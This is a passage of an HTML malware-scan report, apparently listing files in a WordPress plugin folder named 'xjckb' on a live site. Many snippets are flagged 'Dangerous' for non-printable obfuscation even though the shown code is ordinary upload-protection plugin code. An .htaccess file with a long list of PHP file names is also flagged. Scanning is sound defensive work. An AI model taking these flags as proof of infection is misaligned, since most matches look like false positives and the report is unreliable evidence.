</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_253").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_254" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() { require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'admin/class-protect-uploads-admin.php'</span><span style="color: #007700">; require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'includes/class-protect-uploads-deactivator.php'</span><span style="color: #007700">; </span><span style="color: #0000BB">$deactivation </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Deact</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_254").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/admin/class-protect-uploads-admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 40</span><br><table id="file_255" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">() { foreach (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$name </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messages</span><span style="color: #007700">) { foreach (</span><span style="color: #0000BB">$messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$message</span><span style="color: #007700">) { return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">; } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_protective_files_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_root_response_code</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_content</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">() . </span><span style="color: #DD0000">'/.htaccess'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_submenu_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_htaccess_is_self_generated</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_uploads_is_protected</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file_removable</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_protection_message_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_settings_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code</span><span style="color: #007700">.</span><span style="color: #DD0000">', $this->plugin_name);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_apache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'apache_get_modules'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_message</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">'updated'</span><span style="color: #007700">, </span><span style="color: #0000BB">$id </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_styles</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_settings_link</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'basedir'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_url</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uploads_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'baseurl'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_subdirectories</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subs</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_form</span><span style="color: #007700">(</span><span style="color: #0000BB">$form</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_identifier</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"[plugin_name=" </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name </span><span style="color: #007700">. </span><span style="color: #DD0000">"]"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_255").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/admin/.htaccess</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_256" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">comdofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">connects</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">copypaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">delpaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">doiconvs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">epinyins</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">filefuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">gdftps</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hplfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">memberfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">moddofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">onclickfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">phpzipincs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qfunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">schallfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">tempfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">userfu</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_256").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xjckb/admin/views/protect-uploads-admin-settings-page.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.62 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 20:08:05</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_257" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p> </label><br /> } ?> <!-- --> if ( $this->check_protective_file_removable() && $this->check_uploads_is_protected() ) { ?> <label for="protection_3"> <input type="radio" value="remove" nam</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code </span><span style="color: #007700">(</span><span style="color: #0000BB">Forbidden Access</span><span style="color: #007700">).</span><span style="color: #DD0000">', $this->plugin_name); ?></p></span>
</span>
